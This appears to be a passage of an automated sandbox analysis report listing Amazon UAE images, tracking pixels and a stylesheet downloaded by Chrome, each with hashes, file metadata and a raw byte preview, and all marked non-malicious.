                                                                                                                                                                                                                                                                      SHA-256:2DF2FEBE92AB485D09627D4AE216359D400C8541B9E0CA7D599CEC6D32934752
                                                                                                                                                                                                                                                                      SHA-512:E0E01CFB139C7B95F74A6B60F066B8460F15CDC1361381BA62A7A524CB6086F01EA152301C0B9658A4D9FBC87463B3C0810915E4944CC1C2982F77E50C143B8F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61xwfNZIPHL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..............................................................!1.AQ.."aq.2...#BRb.Sr....$3....C.....%D..................................................!..1."Aa.2.Q..#Rq..............?..(....(.@..*.)...\&4.a.Y...[...M.?..bf)<.#.a$......G..Z..SB...n .lk.............'....|.....V.wnwG...P..3.q.,H8.]._.R.d.MG..k..ccY.@t....?...j..$|.......m.Q..7T......R.E.T QE&.qL<.&...WRV;.........h...0.....l..*.E.Rc..*...ey..cZ..YRYP.i1.F.&..+..k...#...<..i]...?.. .X19H...UNB.\..I....4.f...uK~....8.BM..`..9j.zN..`....sU..^..f..{..n.+..\..U.3.qN.~..!F...'.2M...*...6.....<$..b.....mp_.<./*c..n.v...lx.....)..2.G...5Vx.....;c......q".S...f...7..x{..J.G t.mS<W..x.(."#yDa.>....M+>.(...2.k..Q.O...Jj.}!.......7z.......lg.?.'.o..Y}......#r,,..O....fW.)..~.qI..9b9.E...0.>.K...px(.0....)..eS.Jq.......U.U_."..!.T^D.9nZ.<
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):25452
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9710850071968835
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1+98jLtH+P1eKq8BNSGLiZMYlP5DnFdGsSGH:2eVmeKq8Bc1hOsSg
                                                                                                                                                                                                                                                                      MD5:2EAEDE84E445782944F850598738A269
                                                                                                                                                                                                                                                                      SHA1:E881A4EFE42903431ED2DCCF887051E011939864
                                                                                                                                                                                                                                                                      SHA-256:B432EB7FF1CB33B8C114039AF9D548520BCF4B7BCE3F643EC251F78FE2FE8DF0
                                                                                                                                                                                                                                                                      SHA-512:D6DC1C8C00B8E2674492F35982C0CE319CE38437052ED9BB4A7AAEF9B6BE64E3C2923FD4113AAB62DF13011327F168ABEF13D151A4EE510C8E4CF2DC26BE50D1
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................E.QG.(.(#Z.=@ET.A....$.*.....("5.r........@.DI.Q.p.....X.E..z... ....P.p.....5.z.w%.;...s. .....PA....."....%...S..v...(..................t.Cs.;@@D@......(((.#.^y............4....(.........q.:..{.Rx.....Dp*......Q.q.W......}.p.A........(......>^:.eq9{..]...j..S..Q..1AT.@Q@.TkQ.x.6..5....8b.8X.?d.E......lmVc...7wO.Y.vrb...dnOe...........o9-.....#.{&.?.q..Q..r.B.....PU.Vj6.T...c..S.....Z.G.Q26....EUEUPP.X..[.y.Q..w.....m.\.^8.8.5...\..g.*...^.. .M.....Z.|.l1Wc".6..{..G,t.H.G(.0...GZ.1....v..3....mz.F.......gX.AU...dWa...@.-.....b/2..z...tF.#....r.|.......6J.+....G..:.R/0..8".1.b+Y..69.H.$i:.....*P.{p5x>M........Ub...$..p.4..<.YbX.6'..m...((lSw.....5.=.|.7.2<kP#..gY^.9.....!.A.7_.*.|....8W./.'..I.).<s....`.=Ee9....#j.$q...Zt\.=....z4<W.o.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 280x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):21701
                                                                                                                                                                                                                                                                      Entropy (8bit):7.959302559074462
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:9UyLITBA9hF3QmrPBYv/QUHdVcwquQDBNZh8l5leBP68CPdh35b4u:VLMBg3QBHQ8dyuQNNZClCBy8G4u
                                                                                                                                                                                                                                                                      MD5:03EF4BB818233CDF1ED9A66759CD24D8
                                                                                                                                                                                                                                                                      SHA1:15CDCFC6B18495A74F799B2A245B87E59BDF6AC3
                                                                                                                                                                                                                                                                      SHA-256:7FCD82F943DA99D46EB94E3B14737295C2C24B9AC688B7C4BD99F50B500FD8A4
                                                                                                                                                                                                                                                                      SHA-512:DC668A9B06014B087B0677AF743738CFA94BBA2CE2C3CF0F04442BAC692249E6028696598D0C6B2B3ECC0B02E5D1511265441B8EDEDC979336D91712CD8F517F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71CQ6esBqFL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."........../...................................................................p..Y..R.....wM..al.}...S.B3...6fK.Y..v..u..F..@........k......*..Rf...P.9.*cr..;q^4....CIt.HA..X....u...NJ........S_.d.%....%....[.*..=f.c.rc.e...k...4A\..z.\d..N.Y.u.d@....y..5G....m.#..K....L.7d.x...8cn.......D&..Oi...........8........A.:.4B.dmDRSm.l......<.....-..p.4.~....$._&.0Jd[..L.XVY.... ...(5..........m.<....R.B,J.u...,.....#......Lx.k.[...fB:6b..p.....1...>.........M.../<f9..^.......w....?eG#H....%...Za.`.D......}<a..{.7.....D)....Vy.......'....<..w...F.......xu... hd.$.!I.e..^(n.n..V.c.$.}..yP......g....jC...l.....T.L..i..s.........x..Y....M.[..W.........`}..."...%. ....3......./I.\.|..,...E.ke....U.1.,......V..;......z...9.C.../........."....[..N.6.i.V..=K4R.i..8.....>p........Xs.<W..L .Sd.Mi..F.t...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5795
                                                                                                                                                                                                                                                                      Entropy (8bit):7.862691822522222
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:CG8WR10eFGTiWS/Wrr/imDD+OkiE0My+V8Z9A8S4TZVWaJjpmmB/A0ZaB0+jbgw9:CG/RSeFv/kpD+b2M58Z9A8FbJ9mm9A0e
                                                                                                                                                                                                                                                                      MD5:9CF98A02D92FDD1D895974B86A5608AC
                                                                                                                                                                                                                                                                      SHA1:2ACA48049156605E7493B7A7C5F83FFE1059420E
                                                                                                                                                                                                                                                                      SHA-256:2C949E574DE0A6E859A38CD3431A0898DC9015520552EFA3DEBADEF7D8683FB2
                                                                                                                                                                                                                                                                      SHA-512:C404CD915D3D0BC357C7C504723E26A2139D732A409F411A6E2AA36F94371352ED9FEE3E570425524E0C41B85581141D0A6FC64B5C30083F1FFA807C71985FEB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924077_186x116_1X_en_AE._SY116_CB566504241_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................t...."..........9............................................................................:.....S..b...7:NCC.=G.6....5/.p..NL..D.N...l....%..R.t..Ty...".JR.y...s.zi....=.K.4..{R...3.f.....|..=...u..\..u..=w.~cX.Q..,.}..H...w.m...R... .i[.}....t;.^.'h................c.2*u@/...W.`6.`6..6..(.....-..s..n....F...!8J...K^.-T...Doa..^...7....y..T.*.@B.=...A=./.>.mc.[lc....\V........l`..i.6.o.w.. ...........K...'..y..S-o@M[.=c4[./.C..Ho...I1.b.wg..s.q.mSn%9{.S+.+..{. ...T.).S..#.K.z...Gc..(....".w.....xv-H+MY.6v%G...x.+....`.........A..9.......x.$.~@A..ja.{...-............................0.. !#1."2$4ABC...........O.8....)..R/.E.2m...............K...$..G.....7?...X............j..+I[....@..,.....S......Z.F.[.P.]..b...j..F.........7!..N.dU'.K.n.J`..,Z.j...........J.mS......ga(.7r*.b..,O...E*),.#...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 266x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):15124
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9561130161560705
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:ZV7TTXUNEu5RoyUh92CGMsm2mGrTg5Poano0cXhSPHRWkUi5:Z1TY+ujoyG4CGe5Pro0cA/RWM5
                                                                                                                                                                                                                                                                      MD5:606B4943BDEC9CFFC874C2079FAF3FA5
                                                                                                                                                                                                                                                                      SHA1:978B346B71C0697AC4DF41B5870E0D535AC7170D
                                                                                                                                                                                                                                                                      SHA-256:B26ABF349E41A7D051D791720672935473B5912C7B252D6027EE3249E01E7011
                                                                                                                                                                                                                                                                      SHA-512:1FD9EE1CBCDB6833E03BD3A8AE0D827F698FBCFF65D356197997C6E6769137E227ED3501EED1E551757C1424C8102E4522C1C39C1569A426C4537502F15469D3
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71NAHqFhGML._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5......................................................................6n4;..x.wYi....C...+6;..y.OM.#...}.sW.J6................ba..:0...-..Jv....\..Z..i.a.f2.q.sO....IY.......ej.^G]...2...2q..y......94XP.nDd.=9.4.U..{k,Z.3\..0K...hF)fq.1h.......P.O.+.l.5....G.il..b.X..L....C.....gV.F..+....'6.K.....o....._..!B.s-.b.....$V.=...rM.uL..9[.....l.i.!/.Y..P.H...`C..F..9..7#...F0...7.g.Y0.....g-..Kk..`....(w..4.7........i.Q......;.a`..5U..i...,.D..J..y.<WIWW.BW"..@.)....8\.pd...':...X..`....Bj.Q6.-......z+.8..Jlz........6\.#....`Cyo...i..KO@...#.....k....>A......#RVj........Kb=.d...BV.O............VZ_..a.s.$....|....<.f....=nN.....}....n....>'E..&.....j'c&.T.C..Lz.m....Zl..3E....].|*...h..A...:.E............Y.7}i?39K..(.(.`.)h}....bg.7P.!.....W.Z.Y>n.K.Y.....y4'@y...cs..\2[
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4101
                                                                                                                                                                                                                                                                      Entropy (8bit):7.901027181559413
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:71psnyB1Oo4ee++7utVVFfMj0JL0R4ch8zJykJWe2/1:hvB127ut3FAMoRWz2/1
                                                                                                                                                                                                                                                                      MD5:8ED67B5BEEEF77DAE26426C10B5748F3
                                                                                                                                                                                                                                                                      SHA1:29893FB119AA6F62F7594D319824BFA1FBDBFC08
                                                                                                                                                                                                                                                                      SHA-256:1108FDB921BC423D6C18352AD62719C886B43CFB313F2C0BC4D84E49DE21FC97
                                                                                                                                                                                                                                                                      SHA-512:7E3C3C0D6D9B55F12E0E77F341114A839140939909DA01537B1371F0E595905514A43E8600B67549CC21E9B0F2A86DD8A2CCEA0A48601476BCE080B94A5C4D23
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Consumer_Electronics/XCM_CUTTLE_1742948_3924076_186x116_1X_en_AE._SY116_CB566513340_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..............................................................................#.......................................................................t...."...............................................................!.1AQ."2a.....T...Sq....#BDRt.5Cbcr.......................................................!1.....2AQa."q....B....#3CR............?...B...i.aO)./..Z.....}).IUSN.f...2...!-..{]..Vx.....h...T...\....fO#.).../...E.....-i.]o..G......=.2.x-..l.9;..,s.ey....h6+l...L`l.;.R&..{..h{.2.M....?.J.O...A.l.K.\-...)E.....77....Ri..:.....|........,..,;..0.I.T.V.M..:=/v.X.mu.-..a.;.8..5.x.HfS.hy.......C8..C..........$M..{!.JK.....o|..-{....<..h2{..%}.;...E_UA,..T.....9s2.qYOE.A8..f........H..!.4[.%-.W....KQbFa.)......!.....x-{.......K..Owo..-....5..]K...q.....>.l...o...*)p:y...X...5...N|.o..N[..k.;..q...X.0<uL7..$...<.;....-c....<g.'.)=.x.......&.3.....+...E.7...M...".0LJ...j.S.92.2HA.=.".".@L.q?.T.z.6.?*~....K.v0^..~o"@:.H..h.....i.3.hr{.|g.t......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):7057
                                                                                                                                                                                                                                                                      Entropy (8bit):7.879747022942763
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:16BSf/y92QX2cQET5fH0/jq2vnrHFtyESsOln:zf/yEjcJTdJYrHbSZln
                                                                                                                                                                                                                                                                      MD5:45CEAC07CD122C7D93C7F7000A908ED5
                                                                                                                                                                                                                                                                      SHA1:34DAF7D08D2FE411938A84DA3DFE2A234285EC0F
                                                                                                                                                                                                                                                                      SHA-256:0163FD15A23FF949346A7231D96F0B07B54827CDBF2306EA85C3595B6C8069A3
                                                                                                                                                                                                                                                                      SHA-512:FD2872CDCDFD83EABC7A6164C733B829A973ED778F52B63012A05EFDAF82D92C54D94869A3EBF89F4227D53EC5916966AC63017E778FD26621B6742A920E437A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/41iU2dw4mWL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.aj.....'..t."|.R>.9..i..|.p...T/.B./.f..~f.O`........_.>....!b.i...8.N%....w...Z&....oP9..M9..K9..I9.......|.2....b.i...\.u.R.&m..j..G.....B'..A......9...q.....=.A.x.k@..p.C.3...d.1.j..E...r6..Z... e........|..r....3..|.2.....C.4...\.[+LKOV-E}X.2Z..mg;.Y..........?.......)....-...j.[k..mi.j*......[H......>@F....wP..p.....).}.....-.........QU.E]..2.......q.Y.^.. ...>g.......X.kmC.ipj..kSW}........g..E3nc..y.R...wa8..).Ew(....3.N..gym.uM.Z.X..-MU.T..p.F3-.Y.a.L..;.`.0..!.8.&...EwD....3`N...{.*....R=.Sj=.uN...x..t...$a..w.....JV5.-......}k......f?!..s:.)+R=..mC...V..Z.{...;-.z4<...!%...>$.q...tWx@.`..[\...m<.[..:2...%[......jv*....|.]}_.......e...../:....4... e..<.<=.=...<.>yi.7.m..6.:.VM{.....2=eC.g...I..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D1097%26pc%3D5816%26at%3D5816%26t%3D1724264959852%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:5815
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):144274
                                                                                                                                                                                                                                                                      Entropy (8bit):7.735030497100166
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:4HuLo+k6ONuRKXRMVvo95/L7yaZJWdKb/ivUJF6Pw41DNp6FCoC:EuLo+k6VqavU5T7y4n/NjcwY6Fe
                                                                                                                                                                                                                                                                      MD5:82A69B829D3E935D11D849075F6C39A9
                                                                                                                                                                                                                                                                      SHA1:FCBDE75E4547C6A72B7EFDEFF104314CA2149259
                                                                                                                                                                                                                                                                      SHA-256:7EE6B7453552B8CBB749E172224344DF1FF248EAA7146C8AC99B89AF624BA62D
                                                                                                                                                                                                                                                                      SHA-512:9270B5CB3FE40154458A965EB37F5EBAFC96E200F1D7FFF1BF6067DC29D191844A2105E0B0758946C67A176B23A339839B0B7FFE150BBA8023EAF546B9D4D6B7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x292, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):24340
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967645490774351
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:Tl/HxWTnWgYqqTzNO77p+smZ7TaaXjoRmxUdDMMUbo6oy//g7DzdR9Zz/OYW:TDCWv4P/KoExUdgMUbYaA9Zz/OYW
                                                                                                                                                                                                                                                                      MD5:8D15CE73A5C725796EA9A0B4881A43DE
                                                                                                                                                                                                                                                                      SHA1:3E0460C6F4B960D9AD1FAC3F9918B1F2C60D1B01
                                                                                                                                                                                                                                                                      SHA-256:6DF060314BA2D7A88F169ED941B1E008679CDB7BDBDBE3467B17D645DB2E89C7
                                                                                                                                                                                                                                                                      SHA-512:3C5E104BD7A1DABA79262968B9421A660C5C39FD535C36D2995FAD2C143596B4D5245B6AB4DE628D1905B8290C1BE66DE6AEFAF797F5EC128BAE1E07B8DF46C6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71DNx9jePML._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......$.@.."..........4................................................................./..{.z..p{...............]E4n..n.....G..#..._..d...s.S....;....;.6..wJww.AO4D.YH:.....F..5..h...~.A`....]3.J...~..4^.....zj..@o,.........VR....[.....'F.Z..6...K....^>L..w.)..5Tsd7.D...$.h"...y..S.~.)k.{e)HV.|.u.........u..3>.b..d.2..0+...w.x.F/z....*...K...*F...Wb..S...n@...[/....@......V....?.~.E]O...9......R..<...| ...6h..4.P.... sX.3.i..v...j/.f2.c.fEy.'.9.....y[......|.p....?K\e...E..3=...z<y..yX...n+.Qs...`..W?...)D..d.J..Nb..&..l.V.j.....w.\t....g.F..S...._.].Q.......*.",...4.V..SWR..xS.]>....6..mz.).+...,.......T.........mz.....s+.,ph....w.~jn.....ew.i._-@.Gb....n......Hg.kP97..e....dSg........2j..ck.3..d.i....:t}[..yS..&....z).X..6.~4...W.....m..=.`.e..H.<..'...nV.-y..8>.t.&........e9'...r.9)..H_..,Z.%`
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):35200
                                                                                                                                                                                                                                                                      Entropy (8bit):7.938104671632947
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:Ojd7Or1d1idh44WFww9l+FIV2743VeAsx/EYOkayRt8r2tsoA00Q5:e7C1izWFww3fDMjxcqwojP5
                                                                                                                                                                                                                                                                      MD5:C6313C549D91152CC924540DC7678860
                                                                                                                                                                                                                                                                      SHA1:412FA7E652512A3302ACDC7220AE837A21D4D7AE
                                                                                                                                                                                                                                                                      SHA-256:662CABAF27E4EC33F36F4B290A1768A5D1EE4F328C3A8A2148DB2B6ABE93DD96
                                                                                                                                                                                                                                                                      SHA-512:529CDB0728C4E9E9828360B12462FEBC6B6DB3EE31FB40FD98CC7EE96EA7FA6D3CD7F041F995BFC70EEF6522C045D848D9D43721C7886327426CADE52C2C23A7
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/2407GH040_AE_PD23_GW_bubbler_CL_Beautyappliances_400x400_EN._CB567012733_.jpg
                                                                                                                                                                                                                                                                      Preview:.............................................................................................................................................2....Adobe.d..............................................................................................................!1.A."Qa...2Vq....#Rb.$38Bru....4.....%6CDScsv.......5ew.....9FUWdt.............................!1.AQaq...."2S.......BRr......#34b..$%.Ccs...............?....@(......P..@(......P..@(......P..@(......P..@(......P..@(......P..@.....@(......P..@(......P..@...N.w4.3.5.J."./..#.o.Cj@.!;{X..8?.Y...fx.hM.V.c.R../.ex..E9>./K.8m..]$........?{r<TGd.j..k......iWmG.}...2.tW.?).=w._.r[....T......1...9...L#o..p....7..4cn.'.2T.A|......{p.sVe..v.n..E....\.....b...\<..\W.>...).[.Z..../u..|,..=....?.V.Y.ps.G}9>....q......[1.._.......&.l....z...$_.;.?1Qh......{[..^..t;..]...QR...G....?.A.......2.x.....n...w...........<.BK.O.r..g..&...-.rj[.".c...r.R.......MckpW.K.R=.-}..-..xg..K...H...oYJ/.u"0.>E......u....aq<...'..4.n.......
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (18121), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):18121
                                                                                                                                                                                                                                                                      Entropy (8bit):5.2667350205862
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Qohgc8TpIDc8Vjm/x9UjL8s2IE/7Al2muXSjxxo7r74QMAV83OKHeC3WtfagdFZM:5Gdn/UuXSjo7rsQ8eCx4x+
                                                                                                                                                                                                                                                                      MD5:5EA6CF08DBDCE6C1620779C1E86B0A73
                                                                                                                                                                                                                                                                      SHA1:B06AF5A2E3F391670409C94E9F76EEDEF084A3C0
                                                                                                                                                                                                                                                                      SHA-256:CE15CD0773F77B66CC95DE5C483D3E3F72C0CBC00854621C1FCBB0FC5A31A98D
                                                                                                                                                                                                                                                                      SHA-512:83E67E3B5907FD81DAE9E93F9C33EE3DE3D131EB569B7C1DB4BB70510F69F2EAB42800DCD6CEDE866EAB733C8DA3289319351B16D28608FA16730F817DE38710
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/I/41945FR1dZL.css?AUIClients/AmazonGatewayAuiAssets&IaVMOKWd
                                                                                                                                                                                                                                                                      Preview:@charset "UTF-8";.gw-spinner{background:url(https://m.media-amazon.com/images/S/sash/ZUrWp0pf42vcaeo.gif) 50% 50% no-repeat;display:inline-block;vertical-align:top;width:70px;height:70px}.gw-loading-stripe{background:url(https://m.media-amazon.com/images/S/sash/sHjosC8mtVdCbEZ.gif) no-repeat;display:inline-block;vertical-align:top;width:900px;height:3px}.gw-icon{background-size:132px 235px}#pageContent{background:#E3E6E6;margin:0 auto;max-width:none;min-width:1000px;overflow:hidden}#gw-content-grid hr{height:20px;border:none;margin:0}#gw-layout{padding:0 10px 0}#gw-card-layout{max-width:1480px;margin:0 auto;overflow:hidden;padding:20px 0}#gw-card-layout>.gw-col{max-width:400px}#gw-card-layout>.gw-col[data-col-span-ws="2"]{max-width:none}#gw-card-layout>.gw-col[data-col-span-sm="2"]{max-width:none}#gw-card-layout hr{border:none;margin:0}.gw-card-layout[data-flow-dir="h"]>.gw-col{height:420px}#main-content{margin:0 10px}#gw-content-grid{max-width:1480px;margin:0 auto}#gw-content-grid hr:
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:SX0TR1HXR3TVBG1JQK3B$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295396.0%26id%3DSX0TR1HXR3TVBG1JQK3B%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D8173%26pc%3D12400%26at%3D12400%26t%3D1724264979240%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D11601212031%26tid%3DSX0TR1HXR3TVBG1JQK3B%26aftb%3D1%26lob%3D1:12399
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4245
                                                                                                                                                                                                                                                                      Entropy (8bit):7.7625680163677035
                                                                                                                                                                                                                                                                      Encrypted:false
